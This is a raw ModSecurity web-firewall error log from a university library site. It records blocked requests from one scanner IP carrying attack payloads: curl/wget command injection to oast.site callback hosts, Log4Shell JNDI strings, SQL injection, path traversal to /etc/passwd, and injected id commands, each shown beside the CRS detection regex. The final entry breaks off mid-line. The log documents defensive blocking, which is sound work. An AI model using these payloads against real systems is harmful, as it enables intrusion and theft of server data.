[Tue Aug 29 11:30:59.546930 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgx87gocbxuwyfd.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAPLwDEAAAAX"]
[Tue Aug 29 11:31:02.684819 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO10hsCo-f0AAAP4H8oAAAAI"]
[Tue Aug 29 11:31:02.720261 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlga6xm3j1bfe5hh.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10hsCo-f0AAAP4H8sAAAAI"]
[Tue Aug 29 11:31:04.603689 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgojq79me6zp9ro.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP7dXMAAAAR"]
[Tue Aug 29 11:31:04.703450 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlguxbcdc1d9nrra.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlguxbcdc1d9nrra.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP@MvYAAAAZ"]
[Tue Aug 29 11:31:04.999450 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10iMCo-f0AAAQCvy8AAAAk"]
[Tue Aug 29 11:31:05.737344 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "digilib.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQNwEEAAAAv"]
[Tue Aug 29 11:31:06.319574 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQLC@kAAAAt"]
[Tue Aug 29 11:31:06.343065 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQTKFMAAAA1"]
[Tue Aug 29 11:31:07.315726 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlgbg6tu5rfw17sx.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAP7dYUAAAAR"]
[Tue Aug 29 11:31:08.309175 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQTKFgAAAA1"]
[Tue Aug 29 11:31:09.088239 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgdj4z5dyb8heh5.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAQMroUAAAAu"]
[Tue Aug 29 11:31:10.336463 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAP9HgsAAAAW"]
[Tue Aug 29 11:31:10.337063 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQMrooAAAAu"]
[Tue Aug 29 11:31:10.398998 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlg6fi35436p1rtp.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAQLC-MAAAAt"]
[Tue Aug 29 11:31:11.301082 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAQFcQAAAAAn"]
[Tue Aug 29 11:31:11.975213 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlghjq9g44fqmt4a.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAOM4dIAAAAU"]
[Tue Aug 29 11:31:13.316187 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAPRNf8AAAAf"]
[Tue Aug 29 11:31:13.320655 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgjkjxqwrdpjcxm.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAP05J8AAAAA"]
[Tue Aug 29 11:31:13.425198 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAP5mHAAAAAM"]
[Tue Aug 29 11:31:14.343960 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAPPS1YAAAAd"]
[Tue Aug 29 11:31:14.532071 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAQIS7gAAAAq"]
[Tue Aug 29 11:31:15.425858 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAQA-8QAAAAi"]
[Tue Aug 29 11:31:16.761502 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAQOv0IAAAAw"]
[Tue Aug 29 11:31:17.322152 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAQP65sAAAAx"]
[Tue Aug 29 11:31:17.322437 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAQEGG0AAAAm"]
[Tue Aug 29 11:31:17.355581 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAP8GywAAAAV"]
[Tue Aug 29 11:31:18.332479 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAQSWKsAAAA0"]
[Tue Aug 29 11:31:18.399433 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlg15eos64k9qfzw.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAQSWKwAAAA0"]
[Tue Aug 29 11:31:20.343357 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQA-84AAAAi"]
[Tue Aug 29 11:31:22.407304 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag 